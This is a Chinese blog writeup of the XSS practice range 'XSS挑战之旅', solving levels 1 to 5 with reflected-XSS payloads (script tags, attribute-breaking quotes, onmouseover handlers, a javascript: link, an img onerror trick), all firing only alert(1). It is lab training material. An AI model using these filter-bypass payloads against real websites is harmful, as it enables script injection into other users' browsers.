XSS平台 XSS挑战之旅 解题记录 writeup

最新推荐文章于 2024-04-01 09:58:08 发布
最新推荐文章于 2024-04-01 09:58:08 发布
阅读量1.6k 收藏 15
点赞数 2
分类专栏: 靶场搭建与使用 文章标签: XSS平台 XSS writeup CTF 解题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/98342199
版权

XSS平台 XSS挑战之旅 解题记录 writeup


首页
XSS挑战之旅是一个练习简单XSS脚本注入的平台,通过检测弹窗判断用户是否通关。
但前几关存在bug,只要在网页源码图片链接处插入JavaScript代码即可产生弹窗,达到通关的目的。
:Google Chrome存在过滤弹窗,用Firefox浏览器。 

<center><img src="level.png"></center>   //源码
<center><img src=x onerror=alert(1)></center>   //将其修改为这样即可bug通关

详尽的XSS跨站脚本攻击请看:XSS跨站脚本攻击原理与常见的脚本及《XSS跨站脚本攻击剖析与防御》摘录总结

level1

level1
页面中没有输入点,但发现通过地址栏传入的参数‘name=test’会回显在页面,

http://test.xss.tv/level1.php?name=test

尝试通过在URL中构造payload完成XSS攻击:

http://test.xss.tv/level1.php?name=<script>alert(1);</script>

触发弹窗,完成的不错!通关。

level2

在这里插入图片描述
页面存在输入框,搜索的数据在页面有回显,在搜索框构造payload并提交:

<script>alert(1);</script>

返回的页面并没有触发弹窗,查看网页源代码:

<h1 align=center>欢迎来到level2</h1>
<h2 align=center>没有找到和&lt;script&gt;alert(1);&lt;/script&gt;相关的结果.</h2><center>
<form action=level2.php method=GET>
<input name=keyword  value="<script>alert(1);</script>">

发现在<h2>标签中,‘<>’符号被转译,但在<input>标签中‘value’的值完整显示了输入的payload,尝试闭合value的值,在输入框重新构造xss注入代码:

"><script>alert(1);</script>
//提交后源码变为:
<input name=keyword  value=""><script>alert(1);</script>">

触发弹窗,完成的不错!通关。

level3

level3
页面存在输入框,搜索的数据在页面有回显,在搜索框构造payload并提交:

<script>alert(1);</script>

返回的页面并没有触发弹窗,查看网页源代码:

<h1 align=center>欢迎来到level3</h1>
<h2 align=center>没有找到和&lt;script&gt;alert(1);&lt;/script&gt;相关的结果.</h2><center>
<form action=level3.php method=GET>
<input name=keyword  value='&lt;script&gt;alert(1);&lt;/script&gt;'>

发现在<h2>和<input>标签中,‘<>’符号均被转译,尝试搜索“<"/()’>”,在网页源代码查看符号被转译的情况,发现‘<">‘被编码

<h2 align=center>没有找到和&lt;&quot;/()'&gt;相关的结果.</h2><center>
<form action=level3.php method=GET>
<input name=keyword  value='&lt;&quot;/()'&gt;'>

尝试闭合‘value’的值,通过事件触发弹窗,在输入框构造新的payload:

' οnmοuseοver='alert(1)
//提交后源码变为:
<input name=keyword  value='' onmouseover='alert(1)'>

鼠标移到输入框便触发事件产生弹窗,完成的不错!通关。

level4

level4
页面存在输入框,搜索的数据在页面有回显,尝试搜索“<"/()’>”,在网页源代码中查看符号被转译的情况,

<h1 align=center>欢迎来到level4</h1>
<h2 align=center>没有找到和&lt;&quot;/()'&gt;相关的结果.</h2><center>
<form action=level4.php method=GET>
<input name=keyword  value=""/()'">

发现在<h2>标签中,‘<">’被编码,<input>标签里‘value’中的’<>'被替换为空白,尝试闭合‘value’的值,通过事件触发弹窗,在输入框构造新的payload:

" οnmοuseοver="alert(1)
//提交后源码变为:
<input name=keyword  value="" onmouseover="alert(1)">

鼠标移到输入框便触发事件产生弹窗,完成的不错!通关。

level5

在这里插入图片描述
页面存在输入框,搜索的数据在页面有回显,尝试搜索“<"/()’>”,在网页源代码中查看符号被转译的情况,

<h1 align=center>欢迎来到level5</h1>
<h2 align=center>没有找到和&lt;&quot;/()'&gt;相关的结果.</h2><center>
<form action=level5.php method=GET>
<input name=keyword  value="<"/()'>">

搜索"onmouseover"和’<script>alert(1);</script>’,在网页源代码中查看符号被转译的情况,

<input name=keyword  value="o_nmouseover">
<input name=keyword  value="<scr_ipt>alert(1);</script>">

发现在<h2>标签中,‘<">’被编码,<input>标签里‘value’中的‘onmouseover’被替换为‘o_nmouseover’,'script’被替换为scr_ipt,尝试闭合‘value’的值,通过<a href=>标签中的引用属性,在输入框构造新的payload:

"><a href="javascript:alert(1);">aaa</a>
//提交后源码变为:
<input name=keyword  value=""><a href="javascript:alert(1);">aaa</a>">

aaa
通过点击aaa链接,触发javascript脚本引用属性产生弹窗,完成的不错!通关。

level6

level7

level8

level9

level10

level11

level12

level13

Senimo_
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
白帽子之web漏洞--xss攻击
鼓浪屿岛与海的博客
12-04 469
本文仅供学习,不支持一切以不法利益为目的的商业攻击 一.xss攻击原理 xss 是“跨站脚本攻击”,是一种注入攻击,当web应用对用户输入过滤的不严格时,攻击者写入恶意的脚本(CSS,HTML,JavaScript)到网页中时,如果访问了含有恶意代码的页面,恶意脚本就会被浏览器解析执行导致用户被攻击 二.常见xss危害 cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等。 ...
BugKu Web WriteUp
AlexYoung28的博客
08-24 2183
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
ctf_show笔记篇(web入门---XSS
最新发布
whale_waves的博客
04-01 1055
这里简单对xss做一个了解:xss分为反射型和储存型反射型:一般是由攻击者选择攻击对象,对攻击对象发一个带有xss窃取cookie的页面的url,被攻击者点击就会动过document.cookie将用户信息一并发送给攻击方的服务器。反射型XSS一般发生在浏览器,当受害者访问含有XSS代码的页面时浏览器解析并执行XSS代码造成信息泄露。存储型:攻击方将恶意代码插入在存在漏洞的网站上,任何访问网站的人都会遭到攻击,比起反射型xss,存储型xss危害更大,范围更广。
xss-labs 通关笔记
Ewige的博客
06-30 461
靶场地址:传送门 概述: XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 反射型XXS是一种非持久性的攻击,它指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的目的。这里插入的恶意代码并没有保存在目标网站,需要引诱用户点击一个链接到目标网站的恶意链接来实施攻击。 原文链接:ht
Web渗透测试之XSS攻击:初识XSS
vodkaDL的博客
12-16 385
文章目录前言什么是XSS产生XSS攻击漏洞的原因XSS的类型反射型XSS存储型XSS基于DOM的XSSXSS攻击漏洞的危害冒充受害用户上传木马文件总结 前言   本篇将围绕XSS展开,着重介绍什么是XSSXSS攻击漏洞产生的原因以及XSS的类型,最后简述XSS攻击漏洞造成的危害。 什么是XSS   所谓的XSS英文名为Cross-site scripting,翻译过来是跨站点脚本,缩写本应该是CSS,奈何“生不逢时”。由于此CSS容易与前端的CSS冲突,于是只得改为XSS。由跨站点脚本这个中文名也能看出来
XSS跨站脚本攻击漏洞
weixin_43211186的博客
01-10 3045
XSS跨站脚本攻击漏洞 文章目录XSS跨站脚本攻击漏洞0x01 XSS 背景0x02 XSS 概论利用XSS漏洞XSS攻击的类型反射型XSS:存储型XSS:DOM型XSS:0x03 最常见的cookies类型a.Session Cookieb.Persistent Cookiec.Secure cookied.HttpOnly Cookiee.3rd-party cookief.Super Cookie0x04常见标签0x05 检测XSS的办法内容安全策略(CSP)输入文本验证库或框架XSSer 0x01
最新完善版XSS平台源码.zip
11-08
在CSDN上找了好多都是收费好贵的XSS平台源码,为了不让大家损失过多的币,忍痛把自己的源码分享低价给大家用。比某些黑心的分享者50币..要好点吧,代码是一样的,都是最新的。里面只有个默认模块,那些Xss注入语句...
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...
xss平台源码
09-28
xss平台,可以实现XSS盲打等,需要的朋友可以下载。
使用Django简单编写一个XSS平台的方法步骤
09-19
主要介绍了使用Django简单编写一个XSS平台的方法步骤,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
搭建XSS平台所需的资料,亲测可用
09-02
搭建XSS平台所需的资料,亲测可用
xss跨站攻击脚本概述
xu_1234567的博客
10-28 316
1.XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 xss攻击分为三类: (1)持久型跨站(存储型xss ):最直接的危害类型,跨站代码存储在服务器(数据库) (2)非持久型跨站(反射型xss):反射型跨站脚本漏洞,最普
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
CTF/CTF练习平台-XSSxss注入及js unicode编码及innerHTML】
Sp4rkW的博客
08-31 1万+
原题内容: http://103.238.227.13:10089/ Flag格式:Flag:xxxxxxxxxxxxxxxxxxxxxxxx 题目有点坑啊,注入点都没说明,去群里问的,这题注入点为id(get方式),id的值会进行替换后进入s 补充了这个,好了,继续做题 右键源码 &lt;script&gt; var s=""; docu...
XSS挑战之旅
weixin_45670595的博客
03-07 216
第一关 无任何限制 第二关 <h1 align=center>欢迎来到level2</h1> <h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2><center> <form action=level2.php method=GET> <input name=keyword value="&lt..
XSS-labs通关
em.....
10-24 4183
XSS-labs通关 1.第一关 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二关 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三关 ​ ​ 用第二关的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看
手写一个xss防御系统,超简单~
myth_g的博客
06-28 509
原理其实就是加一层过滤请求的过滤器,然后将非法参数根据你的业务去进行屏蔽; 注意事项:如果有接收xml格式的数据,则不要屏蔽<>符号,可以在过滤时判断接收数据类型~ 1)首先创建一个继承HttpServletRequestWrapper的包装类,然后重写以下方法,并且加入到过滤器中(我写到一个类里了): public class DefaultFilter implements...
CTF-web 文件上传,SQL注入,XSS漏洞学习笔记
abtgu的博客
03-14 2004
文章目录CTF-WEB文件上传1. 前端校验2. Content-Type校验3. 黑名单 过滤绕过4. 特殊文件5. 漏洞解析6. %00(url编码) 和 0x00 (16进制)截断SQL注入1. 典型攻击手段:2. 出题人套路:XSS漏洞1. 反射型2. dom型3. 存储型3. 存储型 CTF-WEB 文件上传 1. 前端校验 校验方法:JavaScript判断后缀,类型等 绕过:Bur...
手把手教你搭建XSS平台
seek_2022的博客
05-05 1万+
出于学习和技术分享的目的研究了一下XSS平台搭建的方法,由于网络上的教程虽然很多,但是对于很多细节的讲解不够深入,现将XSS平台搭建方法分享给大家。
蓝莲花xss平台打不开
07-28
很抱歉听到蓝莲花XSS平台无法打开的问题。作为一个AI助手,我无法直接访问特定的网站或平台。通常,如果一个网站无法打开,可能有以下几个原因: 1. 网络连接问题:请确保您的网络连接正常,并尝试刷新页面或使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值